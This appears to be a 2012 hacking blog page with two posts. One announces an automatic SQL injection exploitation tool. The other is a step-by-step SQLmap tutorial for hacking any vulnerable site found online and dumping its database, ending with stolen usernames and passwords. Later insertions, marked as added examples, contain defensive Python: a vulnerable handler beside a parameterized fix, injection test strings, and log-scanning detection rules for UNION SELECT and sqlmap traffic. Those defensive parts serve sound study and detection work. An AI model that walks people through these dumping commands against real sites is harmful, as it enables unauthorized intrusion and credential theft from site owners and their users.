Showing posts with label SQL Injection with SQLmap [BackTrack Tool]. Show all posts

Tuesday, 31 July 2012

The Mole (SQL Injection exploitation tool) v0.3 released


The Mole is an automatic SQL Injection exploitation tool. Given only a vulnerable URL and a valid string on the site, it can detect the injection and exploit it, using either the union technique or a boolean query based technique. The Mole's features and tutorial have been discussed before, but the new version of The Mole (v0.3) has been released and is available to download.
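
The boolean query based technique works because the page returned differs depending on whether a condition appended to the parameter is true or false. As an added example (not code from The Mole or from this post), the Python below puts a handler that concatenates the `id` parameter into its query beside a validated, parameterized one; the table, data and function names are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data for the demonstration.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO articles VALUES (13, 'Welcome to the site')")
    return db

def page_vulnerable(db, raw_id):
    # BEFORE: the request parameter is pasted into the SQL text, so anything
    # appended to the value becomes part of the query itself.
    sql = "SELECT title FROM articles WHERE id = " + raw_id
    rows = db.execute(sql).fetchall()
    return rows[0][0] if rows else "Not found"

def page_fixed(db, raw_id):
    # AFTER: reject anything that is not a plain integer, then bind the value
    # as a parameter so it can never be parsed as SQL.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return "Bad request"
    rows = db.execute("SELECT title FROM articles WHERE id = ?",
                      (int(raw_id),)).fetchall()
    return rows[0][0] if rows else "Not found"

def leaks_boolean_oracle(handler, db):
    # The handler leaks a true/false signal if an always-true and an
    # always-false condition added to a valid id give different pages.
    return handler(db, "13 AND 1=1") != handler(db, "13 AND 1=2")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks:", leaks_boolean_oracle(page_vulnerable, db))
    print("fixed handler leaks:     ", leaks_boolean_oracle(page_fixed, db))
```

The same check is a useful regression test after a fix: the two probes must return the same page.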


Features

  • Support for injections using MySQL, SQL Server, Postgres and Oracle databases.
  • Command line interface. Different commands trigger different actions.
  • Auto-completion for commands, command arguments and database, table and columns names.
  • Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
  • Exploits SQL Injections through GET/POST/Cookie parameters.
  • Developed in Python 3.
  • Exploits SQL Injections that return binary data.
  • Powerful command interpreter to simplify its usage. 

Current Release: v0.3 (2012-03-02)

Current Bug-Free version

Even though we want to keep the release up-to-date, it is impossible to make one for every single patch we have applied to the current version to fix a bug. We strongly recommend using the bugfix branch from our repository. To get it, execute:

git clone -b bugfix git://git.code.sf.net/p/themole/code themole-code

To bring it up to date before using it, update it by executing:

git pull origin bugfix


The Mole's release 0.3 is out! Several bugfixes have been made and new features were introduced, such as:

* Enabled injection through cookie parameters.
* New filtering mechanism enabling better manipulation and easier filter development.
* Added several of those filters.
* SQL Injections that return binary data are now exploitable.
* DBMS credentials listing.

The Mole SQLi Exploitation Tool Tutorial

The complete tutorial with video explanation can be found here.

Wednesday, 25 July 2012

SQL Injection with SQLmap [BackTrack Tool]



Hello again guyz, this is Maher Bro :)
Today I'm going to show you how to hack a SQL Vuln. site with SQLmap in BackTrack 5.
First of all, find a Vuln. site.. you can see how in the SQL injection tutorial :)
Second of all, open BackTrack > Terminal, then type:
cd /pentest/database/sqlmap
and hit Enter.
Now we are inside SQLmap, let's start hacking :P

####################################################################

Now the options we will need here are:

+++++++++++++++++++++++++++++++++++++++++
-D         <= define the database
-T         <= define the table
-C         <= define the column
--dbs      <= bring database names
--tables   <= bring table names
--columns  <= bring column names
--dump     <= dump the data out of the column
++++++++++++++++++++++++++++++++++++++++++

###################################################################



Let's start :)

Our first command will be:

./sqlmap.py -u www.website.com/index.php?id=13 --dbs    <= Example!
It will look like:
Then we will get the database names like:
Now we will ask for the tables from any of those databases with --tables.
We have to select the database with "-D" and ask for the tables with "--tables" :)
So we will type:

./sqlmap.py -u www.website.com/index.php?id=13 -D database_name --tables
I chose the walnut_live database, so I typed:
and the results will be the table names of course :P
It will look like:

Now we got the tables and found the users table!!
Now we will select this table with "-T". We have already selected our database, so we write the same command but replace "--tables" with "-T table_name" (here the "users" table), and then ask for the columns inside that table with "--columns". It will be like:

./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name --columns
It will look like:
Now we will get the results, the columns.
They will come like this:

As you can see, we got the "id, pass, and user" columns.
Now we want the data from them, so we will dump the data :P with "--dump".
But here we have two ways to get them..
We can dump all the data at once, or select a column and get the data from it.
I will show you how both of them look and are used..

First we can get all the data with this command:

./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name --dump
which will get us all the data at once and will look like this:
and the result is:
In the picture I marked the user and pass :)
Now we will try getting them one by one with this command:

./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name -C column_name --dump
for example I will get user and pass:

User::


 result::

pass::
result::
######################################################################

we are done!!
It's hacked, we got the User, and Password :)
have fun
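
The enumeration run described in this post is visible in the web server's access log. As an added example (not part of the original post), the Python below scans combined-format log lines for injection-shaped `GET` query strings and for a User-Agent containing `sqlmap/`; the log lines are constructed samples, the rule names are hypothetical, and the User-Agent check assumes the tool's default header was not changed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [25/Jul/2012:10:00:01 +0000] "GET /index.php?id=13 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Jul/2012:10:02:11 +0000] "GET /index.php?id=13%20AND%204821%3D4821 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [25/Jul/2012:10:02:12 +0000] "GET /index.php?id=13%20AND%204821%3D9077 HTTP/1.1" 200 812 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [25/Jul/2012:10:02:15 +0000] "GET /index.php?id=13%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Jul/2012:10:03:40 +0000] "GET /search.php?q=union+station+tickets HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# client, request target and User-Agent from one combined-format line
LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')

# Hypothetical rule names; patterns run on the URL-decoded, lowercased query.
QUERY_RULES = {
    "boolean-test": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+"),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema-enum": re.compile(r"\binformation_schema\b"),
}

def scan(log_text):
    """Return {client_ip: sorted list of rule names that fired}."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, target, agent = m.groups()
        query = unquote_plus(urlsplit(target).query).lower()
        fired = {name for name, rx in QUERY_RULES.items() if rx.search(query)}
        if "sqlmap/" in agent.lower():
            fired.add("tool-user-agent")
        if fired:
            hits.setdefault(ip, set()).update(fired)
    return {ip: sorted(names) for ip, names in hits.items()}

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, names)
```

Access logs normally record only the request line, so injection through POST bodies or cookies needs those fields logged separately before a check like this can see it.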